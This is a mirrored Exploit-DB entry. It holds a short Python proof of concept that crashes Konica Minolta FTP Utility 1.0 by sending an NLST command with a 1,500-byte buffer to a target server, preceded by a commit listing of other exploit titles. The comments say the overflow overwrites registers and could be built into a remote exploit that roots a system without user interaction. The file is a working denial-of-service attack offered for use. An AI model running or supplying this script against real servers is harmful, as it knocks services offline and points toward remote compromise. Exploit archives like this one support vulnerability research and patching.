exploit-db-mirror/exploits/windows/dos/48502.py
Offensive Security 5308efc65c DB: 2020-05-23
8 changes to exploits/shellcodes

Konica Minolta FTP Utility 1.0 - 'LIST' Denial of Service (PoC)
Konica Minolta FTP Utility 1.0 - 'NLST' Denial of Service (PoC)
Filetto 1.0 - 'FEAT' Denial of Service (PoC)
Druva inSync Windows Client 6.6.3 - Local Privilege Escalation
VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP_ASLR)

WebLogic Server - Deserialization RCE - BadAttributeValueExpException (Metasploit)
Dolibarr 11.0.3 - Persistent Cross-Site Scripting
Gym Management System 1.0 - Unauthenticated Remote Code Execution
2020-05-23 05:01:53 +00:00

30 lines
No EOL
1.2 KiB
Python
Executable file

# Exploit Title: Konica Minolta FTP Utility 1.0 - 'NLST' Denial of Service (PoC)
# Date: 2020-05-16
# Found by: Alvaro J. Gene (Socket_0x03)
# Software Link: https://konica-minolta-ftp-utility.software.informer.com/download/
# Vulnerable Application: Konica Minolta FTP Utility
# Version: 1.0
# Server: FTP Server
# Vulnerable Command: NLST
# Tested on: Windows 7 SP1
# Impact: There is a buffer overflow vulnerability in the NLST command of the FTP server
# "Konica Minolta FTP Utility" that will allow an attacker to overwrite some registers,
# such as EAX, ESI, EDI... Even though the next codes will crash the FTP server and overwrite
# some registers, an individual can use the vulnerable command to build a remote buffer
# overflow exploit that will root a system without any user interaction.
====================================================================================================
=============== [ Konica Minolta FTP Utility v1.0 - 'NLST' Denial of Service (PoC) ] ===============
====================================================================================================
from ftplib import FTP
ftp = FTP('192.168.0.16')
buffer = "A" * 1500
ftp.login()
ftp.retrlines('NLST ' + buffer)